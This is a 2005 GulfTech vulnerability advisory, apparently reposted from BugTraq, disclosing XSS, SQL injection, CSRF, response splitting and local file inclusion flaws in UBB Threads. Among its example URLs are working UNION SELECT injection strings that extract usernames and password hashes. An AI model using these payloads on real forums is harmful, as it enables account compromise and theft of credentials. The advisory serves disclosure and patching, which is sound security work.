Infopop UBB Threads Multiple Vulnerabilities

From: GulfTech Security Research (security_at_gulftech.org)
Date: 06/24/05

  • Next message: Przemyslaw Frasunek: "Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities" 
    Date: Thu, 23 Jun 2005 23:26:51 -0500
To: BugTraq <bugtraq@securityfocus.com>, Secunia Research <vuln@secunia.com>, OSVDB <moderators@osvdb.org>

    ##########################################################
    # GulfTech Security Research June 23rd, 2005
    ##########################################################
    # Vendor : Infopop Corporation
    # URL : http://www.ubbcentral.com/ubbthreads/
    # Version : All Versions Prior To 6.5.2 Beta
    # Risk : Multiple Vulnerabilities
    ##########################################################

    Description:
    UBB Threads is a very popular forum system developed by Infopop.
    There are a number of vulnerabilities in UBB Threads that may allow
    an attacker to execute cross site scripting, http response splitting,
    and cross site request forgery attacks. Also, an attacker may include,
    execute, or read arbitrary local files. These vulnerabilities may allow
    for an attacker to completely compromise an installation of UBB Threads
    and possibly more. Users are encouraged to upgrade as soon as possible
    to the latest UBB Threads release.

    Cross Site Scripting:
    There are a large number of cross site scripting issues in UBB Threads.
    Due to the large number the examples I will simply put a [XSS] where an
    attacker might place offending code. Some examples might look like this.

    http://ubbt/dosearch.php?Cat=0&Searchpage=2[XSS]&topic=
    http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818[XSS]&page=0&what=showflat&fpart=1&vc=1
    http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0&what=showflat[XSS]&fpart=1&vc=1
    http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0[XSS]&what=showflat&fpart=1&vc=1
    http://ubbt/showprofile.php?Cat=0&User=7&Number=39818[XSS]&Board=UBB8&what=showflat&page=0&fpart=1&vc=1
    http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8[XSS]&what=showflat&page=0&fpart=1&vc=1
    http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8&what=showflat[XSS]&page=0&fpart=1&vc=1
    http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all[XSS]
    http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0[XSS]&fpart=all
    http://ubbt/showmembers.php?Cat=&like=p[XSS]&sb=1&page=1

    These vulnerabilities can be used to steal sensitive information from a
    user, and possibly lead to malicious code execution in the context of
    the victims browser.

    SQL Injection:
    There are a number of SQL Injection issues in UBB Threads that allow for
    an attacker to influence, or disclose sensitive information in the
    underlying
    database. Below are some examples.

    http://ubbt/download.php?Number=42227[SQL]
    http://ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
    http://ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
    http://ubbt/modifypost.phpCat=0&Username=foobar&Number=
    [SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup
    &Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&
    preview=1&peditdelete=Delete+this+post

    The above is just examples, and will not do anything except maybe
    trigger an error
    but I will provide a few examples of how these vulnerabilities could be
    exploited.
    First, there is an SQL Injection issue that occurs when emailing a
    thread to someone

    http://ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username
    ,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&
    fpart=1&what=showflat

    Visiting a url like the one above by itself will not cause much to
    happen, but if
    you complete the form, you will notice an email arrives at the address
    you specified
    in the form, and the contents of that email are the contents you queried
    from the
    database! Also, in the private messaging feature there is another
    serious SQL Injection
    issue.

    http://ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,
    0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received

    A url like the one above would yield the user 'foobar' s password hash
    and username.

    http://ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=
    0&vc=1&fpart=1&what=showflat
    http://ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
    http://ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]

    Also, there are a few SQL Injection issues that require the post method.
    For example
    when rating a profile, or post, or anything else (they all use the same
    feature) you
    can specify arbitrary SQL statements to the "Main" parameter. Also, when
    conducting a
    search an attacker may specify arbitrary SQL statements in the "Forum[]"
    array and
    have them execute successfully with the privileges of the current mysql
    user.

    Cross Site Request Forgery:
    There are a number of CSRF issues in UBB Threads, and these issues allow
    for an attacker
    to unwillingly change their ignore, and address settings.

    http://ubbt/addaddress.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1
    http://ubbt/toggleignore.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1
    http://ubbt/removeignore.php?Cat=&User=123
    http://ubbt/removeaddress.php?Cat=&User=123

    These issues really affect privacy on the forums, and make it nearly
    impossible to keep
    away from any harassing members :)

    HTTP Response Splitting:
    There are several HTTP Response Splitting issues in UBB Threads. These
    issues allow
    for an attacker to manipulate headers sent back to the user, and may
    allow for code
    execution in the context of the victims browser. The "Cat" parameter in
    the files
    toggleshow.php, togglecats.php, and showprofile.php are all vulnerable.

    Local File Inclusion:
    UBB Threads suffers from a local file inclusion vulnerability when
    handling language
    preferences extracted from the cookie. The "language" parameter is never
    sanitized
    and can thus be exploited by specifying an arbitrary file location
    appended with a null
    byte (%00). This could lead to code execution, or in most cases, file
    disclosure.

    Solution:
    An updated version of UBB threads has been released to address the
    previously mentioned
    issues, and users are strongly advised to upgrade immediately.

    http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351

    Users can visit the above url to get information regarding UBB Threads
    security updates.

    Related Info:
    The original advisory can be found at the following location
    http://www.gulftech.org/?node=research&article_id=00084-06232005

    Credits:
    James Bercegay of the GulfTech Security Research Team

  • Next message: Przemyslaw Frasunek: "Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities"